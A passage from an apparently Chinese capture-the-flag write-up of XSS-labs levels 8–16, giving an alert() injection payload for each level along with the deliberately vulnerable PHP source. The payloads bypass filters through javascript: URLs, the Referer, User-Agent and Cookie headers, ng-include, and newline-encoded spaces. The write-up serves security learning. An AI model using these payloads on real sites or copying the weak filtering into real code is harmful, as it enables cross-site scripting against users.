class="string">'&quot'</span>,<span class="variable">$str6</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'<center></span></span><br><span class="line"><span class="string"><form action=level8.php method=GET></span></span><br><span class="line"><span class="string"><input name=keyword value="'</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">'"></span></span><br><span class="line"><span class="string"><input type=submit name=submit value=添加友情链接 /></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="meta"><?php</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<center><BR><a href="'</span>.<span class="variable">$str7</span>.<span class="string">'">友情链接</a></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 9</p> <p>本题相较Level 8新增了网址合法性检测,经测试只需带有<a class="link" href="http://xn--zlr2ki56c6eedn6choa/" >http://即可通过检测<i class="fas fa-external-link-alt"></i></a>,可以将alert()内的字符改成http://,也可以在文末添加并使用注释符进行注释。</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202155310700.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202155310700.png" alt="image-20240202155310700" ></a></p> <p><strong>答案:<code>javaScript:alert('http://')</code></strong></p> <p>即:javascript:alert(‘http://’)</p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="title function_ invoke__">strtolower</span>(<span class="variable">$_GET</span>[<span class="string">"keyword"</span>]);</span><br><span class="line"><span class="variable">$str2</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"script"</span>,<span class="string">"scr_ipt"</span>,<span class="variable">$str</span>);</span><br><span class="line"><span class="variable">$str3</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"on"</span>,<span class="string">"o_n"</span>,<span class="variable">$str2</span>);</span><br><span class="line"><span class="variable">$str4</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"src"</span>,<span class="string">"sr_c"</span>,<span class="variable">$str3</span>);</span><br><span class="line"><span class="variable">$str5</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"data"</span>,<span class="string">"da_ta"</span>,<span class="variable">$str4</span>);</span><br><span class="line"><span class="variable">$str6</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"href"</span>,<span class="string">"hr_ef"</span>,<span class="variable">$str5</span>);</span><br><span class="line"><span class="variable">$str7</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">'"'</span>,<span class="string">'&quot'</span>,<span class="variable">$str6</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'<center></span></span><br><span class="line"><span class="string"><form action=level9.php method=GET></span></span><br><span class="line"><span class="string"><input name=keyword value="'</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">'"></span></span><br><span class="line"><span class="string"><input type=submit name=submit value=添加友情链接 /></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="keyword">if</span>(<span class="literal">false</span>===<span class="title function_ invoke__">strpos</span>(<span class="variable">$str7</span>,<span class="string">'http://'</span>))</span><br><span class="line">{</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>'</span>;</span><br><span class="line"> }</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">{</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<center><BR><a href="'</span>.<span class="variable">$str7</span>.<span class="string">'">友情链接</a></center>'</span>;</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 10</p> <p>测试第一个标签处,发现全都被过滤</p> <p><a href="https://img-blog.csdnimg.cn/cac51a8eb6fd47de8782e2b57d225cf8.png"><img lazyload alt="image" data-src="https://img-blog.csdnimg.cn/cac51a8eb6fd47de8782e2b57d225cf8.png" alt="img" ></a></p> <p>只能从源代码中的三个hidden元素入手,进行传值测试后发现t_sort有回显(GET),其余两个猜测为POST型</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202155934507.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202155934507.png" alt="image-20240202155934507" ></a></p> <p><strong>答案:<code>?t_sort=" onfocus=javascript:alert() type="text//</code></strong> ,因为此处输入框被隐藏,需要添加type=“text”,或者在控制台内修改此处的hidden为button等。</p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="variable">$_GET</span>[<span class="string">"keyword"</span>];</span><br><span class="line"><span class="variable">$str11</span> = <span class="variable">$_GET</span>[<span class="string">"t_sort"</span>];</span><br><span class="line"><span class="variable">$str22</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">">"</span>,<span class="string">""</span>,<span class="variable">$str11</span>);</span><br><span class="line"><span class="variable">$str33</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"<"</span>,<span class="string">""</span>,<span class="variable">$str22</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form id=search></span></span><br><span class="line"><span class="string"><input name="t_link" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_history" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_sort" value="'</span>.<span class="variable">$str33</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><center><img src=level10.png></center></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h3 align=center>payload的长度:"</span>.<span class="title function_ invoke__">strlen</span>(<span class="variable">$str</span>).<span class="string">"</h3>"</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 11</p> <p>查看网页源代码发现有四个hidden,分别尝试传值发现t_sort有回显,但几乎所有方法都被过滤,猜测t_ref为Referer头</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204135104746.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204135104746.png" alt="image-20240204135104746" ></a></p> <p>BP抓包向Referer头填充数值1即可发现回显在t_ref内,可以在Referer头内构造Payload,相应包正确后在抓到的包内添加Referer头并放包即可。</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204135754206.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204135754206.png" alt="image-20240204135754206" ></a></p> <p><strong>答案:<code>Referer: " onclick="alert(1)" type="true</code></strong></p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><!DOCTYPE html><!--STATUS OK--><html></span><br><span class="line"><head></span><br><span class="line"><meta http-equiv=<span class="string">"content-type"</span> content=<span class="string">"text/html;charset=utf-8"</span>></span><br><span class="line"><script></span><br><span class="line">window.alert = <span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span></span><br><span class="line"><span class="function"></span>{ </span><br><span class="line"><span class="title function_ invoke__">confirm</span>(<span class="string">"完成的不错!"</span>);</span><br><span class="line"> window.location.href=<span class="string">"level12.php?keyword=good job!"</span>; </span><br><span class="line">}</span><br><span class="line"></script></span><br><span class="line"><title>欢迎来到level11</title></span><br><span class="line"></head></span><br><span class="line"><body></span><br><span class="line"><h1 align=center>欢迎来到level11</h1></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="variable">$_GET</span>[<span class="string">"keyword"</span>];</span><br><span class="line"><span class="variable">$str00</span> = <span class="variable">$_GET</span>[<span class="string">"t_sort"</span>];</span><br><span class="line"><span class="variable">$str11</span>=<span class="variable">$_SERVER</span>[<span class="string">'HTTP_REFERER'</span>];</span><br><span class="line"><span class="variable">$str22</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">">"</span>,<span class="string">""</span>,<span class="variable">$str11</span>);</span><br><span class="line"><span class="variable">$str33</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"<"</span>,<span class="string">""</span>,<span class="variable">$str22</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form id=search></span></span><br><span class="line"><span class="string"><input name="t_link" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_history" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_sort" value="'</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str00</span>).<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_ref" value="'</span>.<span class="variable">$str33</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><center><img src=level11.png></center></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h3 align=center>payload的长度:"</span>.<span class="title function_ invoke__">strlen</span>(<span class="variable">$str</span>).<span class="string">"</h3>"</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"></body></span><br><span class="line"></html></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 12</p> <p>与11题原理相同,注入点在UA头</p> <p><strong>答案:<code>User-Agent: " onclick="alert(1)" type="true</code></strong></p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><!DOCTYPE html><!--STATUS OK--><html></span><br><span class="line"><head></span><br><span class="line"><meta http-equiv=<span class="string">"content-type"</span> content=<span class="string">"text/html;charset=utf-8"</span>></span><br><span class="line"><script></span><br><span class="line">window.alert = <span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span></span><br><span class="line"><span class="function"></span>{ </span><br><span class="line"><span class="title function_ invoke__">confirm</span>(<span class="string">"完成的不错!"</span>);</span><br><span class="line"> window.location.href=<span class="string">"level13.php?keyword=good job!"</span>; </span><br><span class="line">}</span><br><span class="line"></script></span><br><span class="line"><title>欢迎来到level12</title></span><br><span class="line"></head></span><br><span class="line"><body></span><br><span class="line"><h1 align=center>欢迎来到level12</h1></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="variable">$_GET</span>[<span class="string">"keyword"</span>];</span><br><span class="line"><span class="variable">$str00</span> = <span class="variable">$_GET</span>[<span class="string">"t_sort"</span>];</span><br><span class="line"><span class="variable">$str11</span>=<span class="variable">$_SERVER</span>[<span class="string">'HTTP_USER_AGENT'</span>];</span><br><span class="line"><span class="variable">$str22</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">">"</span>,<span class="string">""</span>,<span class="variable">$str11</span>);</span><br><span class="line"><span class="variable">$str33</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"<"</span>,<span class="string">""</span>,<span class="variable">$str22</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form id=search></span></span><br><span class="line"><span class="string"><input name="t_link" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_history" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_sort" value="'</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str00</span>).<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_ua" value="'</span>.<span class="variable">$str33</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><center><img src=level12.png></center></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h3 align=center>payload的长度:"</span>.<span class="title function_ invoke__">strlen</span>(<span class="variable">$str</span>).<span class="string">"</h3>"</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"></body></span><br><span class="line"></html></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 13</p> <p>原理与11题一样,注入点在Cookie,注意要触发cookie</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204140248710.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204140248710.png" alt="image-20240204140248710" ></a></p> <p><strong>答案:<code>Cookie: user=" onclick="alert(1)" type="true</code></strong></p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><!DOCTYPE html><!--STATUS OK--><html></span><br><span class="line"><head></span><br><span class="line"><meta http-equiv=<span class="string">"content-type"</span> content=<span class="string">"text/html;charset=utf-8"</span>></span><br><span class="line"><script></span><br><span class="line">window.alert = <span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span></span><br><span class="line"><span class="function"></span>{ </span><br><span class="line"><span class="title function_ invoke__">confirm</span>(<span class="string">"完成的不错!"</span>);</span><br><span class="line"> window.location.href=<span class="string">"level14.php"</span>; </span><br><span class="line">}</span><br><span class="line"></script></span><br><span class="line"><title>欢迎来到level13</title></span><br><span class="line"></head></span><br><span class="line"><body></span><br><span class="line"><h1 align=center>欢迎来到level13</h1></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">setcookie</span>(<span class="string">"user"</span>, <span class="string">"call me maybe?"</span>, <span class="title function_ invoke__">time</span>()+<span class="number">3600</span>);</span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="variable">$_GET</span>[<span class="string">"keyword"</span>];</span><br><span class="line"><span class="variable">$str00</span> = <span class="variable">$_GET</span>[<span class="string">"t_sort"</span>];</span><br><span class="line"><span class="variable">$str11</span>=<span class="variable">$_COOKIE</span>[<span class="string">"user"</span>];</span><br><span class="line"><span class="variable">$str22</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">">"</span>,<span class="string">""</span>,<span class="variable">$str11</span>);</span><br><span class="line"><span class="variable">$str33</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"<"</span>,<span class="string">""</span>,<span class="variable">$str22</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form id=search></span></span><br><span class="line"><span class="string"><input name="t_link" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_history" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_sort" value="'</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str00</span>).<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_cook" value="'</span>.<span class="variable">$str33</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><center><img src=level13.png></center></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h3 align=center>payload的长度:"</span>.<span class="title function_ invoke__">strlen</span>(<span class="variable">$str</span>).<span class="string">"</h3>"</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"></body></span><br><span class="line"></html></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 14</p> <p>本题环境出现问题,略(Windows服务器下无法复现)</p> </li> <li> <p>Level 15</p> <p>本题考查ng-include函数的使用</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204140554202.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204140554202.png" alt="image-20240204140554202" ></a></p> <p><strong>答案:<code>src='level1.php?name=<script>alert(1)</script>'</code></strong></p> <ul> <li> <p><code>ng-include</code>是AngularJS框架中的一个指令(directive)。</p> <p><code>ng-include</code>用于在AngularJS应用中包含外部的HTML文件或其他AngularJS模板。<strong>引入AngularJS库:</strong> 确保在你的HTML文件中引入了AngularJS库。</p> <ol> <li> <pre><code class="language-html"><script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.8.0/angular.min.js"></script> XML2. **创建AngularJS应用:** 在HTML文件中定义一个AngularJS应用。 ```html <div ng-app="myApp"> <!-- 应用内容将在这里 --> </div> <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">2. **使用`ng-include`指令:** 在需要包含外部内容的地方使用`ng-include`指令,并指定要包含的文件路径。</span><br><span class="line"></span><br><span class="line"> ```html</span><br><span class="line"> <div ng-include="'path/to/your/template.html'"></div></span><br></pre></td></tr></table></figure> 注意:单引号内的路径可以是相对路径或绝对路径。 </code></pre> </li> <li> <p><strong>定义AngularJS模块和控制器:</strong> 在JavaScript中定义AngularJS模块和控制器,并将其与应用相关联。</p> <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">script</span>></span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript"> <span class="keyword">var</span> app = angular.<span class="title function_">module</span>(<span class="string">'myApp'</span>, []);</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript"> app.<span class="title function_">controller</span>(<span class="string">'myController'</span>, <span class="keyword">function</span>(<span class="params">$scope</span>) {</span></span><br><span class="line"><span class="language-javascript"> <span class="comment">// 控制器逻辑</span></span></span><br><span class="line"><span class="language-javascript"> });</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag"></<span class="name">script</span>></span></span><br></pre></td></tr></table></figure> </li> <li> <p><strong>关联控制器和<code>ng-include</code>:</strong> 在包含<code>ng-include</code>的元素中使用<code>ng-controller</code>来关联控制器。</p> <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">div</span> <span class="attr">ng-controller</span>=<span class="string">"myController"</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">div</span> <span class="attr">ng-include</span>=<span class="string">"'path/to/your/template.html'"</span>></span><span class="tag"></<span class="name">div</span>></span></span><br><span class="line"><span class="tag"></<span class="name">div</span>></span></span><br></pre></td></tr></table></figure> </li> </ol> <p>这样,<code>ng-include</code>指令就会加载指定的HTML文件或AngularJS模板,并将其内容包含在应用中。这是一种实现模块化和代码重用的方式,特别适用于大型AngularJS应用。</p> </li> </ul> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><html ng-app></span><br><span class="line"><head></span><br><span class="line"> <meta charset=<span class="string">"utf-8"</span>></span><br><span class="line"> <script src=<span class="string">"angular.min.js"</span>></script></span><br><span class="line"><script></span><br><span class="line">window.alert = <span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span></span><br><span class="line"><span class="function"></span>{ </span><br><span class="line"><span class="title function_ invoke__">confirm</span>(<span class="string">"完成的不错!"</span>);</span><br><span class="line"> window.location.href=<span class="string">"level16.php?keyword=test"</span>; </span><br><span class="line">}</span><br><span class="line"></script></span><br><span class="line"><title>欢迎来到level15</title></span><br><span class="line"></head></span><br><span class="line"><h1 align=center>欢迎来到第<span class="number">15</span>关,自己想个办法走出去吧!</h1></span><br><span class="line"><p align=center><img src=level15.png></p></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="variable">$_GET</span>[<span class="string">"src"</span>];</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'<body><span class="ng-include:'</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">'"></span></body>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 16</p> <p>本题在<center>标签内,根据后面的<img>标签提示,我们可以构造一个img标签</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204141319824.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204141319824.png" alt="image-20240204141319824" ></a></p> <p>经过尝试发现过滤了空格,我们可以用<code>%0A</code>换行符绕过空格</p> <p><strong>答案:<code>keyword=<img%0Asrc=1%0Aonclick="alert(1)"></code></strong></p> <p>答案实际形式:</p> <figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">keyword=<img</span><br><span class="line">src=1</span><br><span class="line">onclick="alert(1)"></span><br></pre></td></tr></table></figure> <p>源代码:</p> <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><!DOCTYPE <span class="keyword">html</span>></span><span class="comment"><!--STATUS OK--></span><span class="tag"><<span class="name">html</span>></span></span><br><span class="line"><span class="tag"><<span class="name">head</span>></span></span><br><span class="line"><span class="tag"><<span class="name">meta</span> <span class="attr">http-equiv</span>=<span class="string">"content-type"</span> <span class="attr">content</span>=<span class="string">"text/html;charset=utf-8"</span>></span></span><br><span class="line"><span class="tag"><<span class="name">script</span>></span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript"><span class="variable language_">window</span>.<span class="property">alert</span> = <span class="keyword">function</span>(<span class="params"></span>) </span></span><br><span class="line"><span class="language-javascript">{ </span></span><br><span class="line"><span class="language-javascript"><span class="title function_">confirm</span>(<span class="string">"完成的不错!"</span>);</span></span><br><span class="line"><span class="language-javascript"> <span class="variable language_">window</span>.<span class="property">location</span>.<span class="property">href</span>=<span class="string">"level17.php?arg01=a&arg02=b"</span>; </span></span><br><span class="line"><span class="language-javascript">}</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag"></<span class="name">script</span>></span></span><br><span class="line"><span class="tag"><<span class="name">title</span>></span>欢迎来到level16<span class="tag"></<span class="name">title</span>></span></span><br><span class="line"><span class="tag"></<span class="name">head</span>></span></span><br><span class="line"><span class="tag"><<span class="name">body</span>></span></span><br><span class="line"><span class="tag"><<span class="name">h1</span> <span class="attr">align</span>=<span class="string">center</span>></span>欢迎来到level16<span class="tag"></<span class="name">h1</span>></span></span><br><span class="line"><span class="meta"><?php </span></span><br><span class="line"><span class="meta">ini_set("display_errors", 0);</span></span><br><span class="line"><span class="meta">$str = strtolower($_GET["keyword"]);</span></span><br><span class="line"><span class="meta">$str2=str_replace("script","&nbsp;",$str);</span></span><br><span class="line"><span class="meta">$str3=str_replace(" ","&nbsp;",$str2);</span></span><br><span class="line"><span class="meta">$str4=str_replace("/","&nbsp;",$str3);</span></span><br><span class="line"><span class="meta">$str5=str_replace(" ","&nbsp;",$str4);</span></span><br><span class="line"><span class="meta">echo "<center>".$str5."</center>";</span></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="tag"><<span class="name">center</span>></span><span class="tag"><<span class="name">img</span> <span class="attr">src</span>=<span class="string">level16.png</span>></span><span 